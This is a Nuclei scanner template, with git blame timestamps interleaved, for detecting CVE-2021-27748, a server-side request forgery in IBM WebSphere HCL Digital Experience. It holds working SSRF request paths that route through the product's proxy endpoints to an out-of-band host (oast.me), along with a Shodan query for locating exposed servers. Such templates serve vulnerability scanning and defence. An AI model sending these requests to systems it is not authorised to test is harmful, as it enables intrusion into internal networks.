2022-06-06 10:53:02 +00:00
id : CVE-2021-27748
2021-12-29 12:02:10 +00:00
info :
2022-06-27 15:58:08 +00:00
name : IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
2021-12-29 12:02:10 +00:00
author : pdteam
severity : high
2022-06-06 10:53:02 +00:00
description : |
2022-07-26 13:45:11 +00:00
IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by IBM to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
2022-06-06 10:53:02 +00:00
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
2024-01-17 19:53:00 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
2022-06-06 10:53:02 +00:00
classification :
cve-id : CVE-2021-27748
2022-06-27 23:15:56 +00:00
metadata :
verified : true
2023-09-06 12:09:01 +00:00
max-request : 2
2022-06-27 23:15:56 +00:00
shodan-query : http.html:"IBM WebSphere Portal"
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,hcl,ibm,ssrf,websphere
2021-12-29 12:02:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-29 12:02:10 +00:00
- method : GET
path :
2023-03-09 14:48:32 +00:00
- '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
2021-12-29 12:02:10 +00:00
2022-10-07 21:27:25 +00:00
host-redirects : true
2021-12-29 12:02:10 +00:00
max-redirects : 2
stop-at-first-match : true
2023-08-31 11:46:18 +00:00
2021-12-29 12:02:10 +00:00
matchers-condition : and
matchers :
- type : word
words :
2022-06-27 23:15:56 +00:00
- "Interactsh Server"
2022-06-27 15:58:08 +00:00
2022-06-28 02:39:00 +00:00
- type : status
status :
2022-07-26 13:45:11 +00:00
- 200
2024-01-26 08:31:11 +00:00
# digest: 4b0a00483046022100b6134f89233da535e75fb3d2abac8b55797ec0997bc234ba4559b250efcc3489022100c2cce298030c3efdccc4e809925e7d77d72aab31f1de74f9c86ab5ae022b0a1e:922c64590222798bb761d5b6d8e72950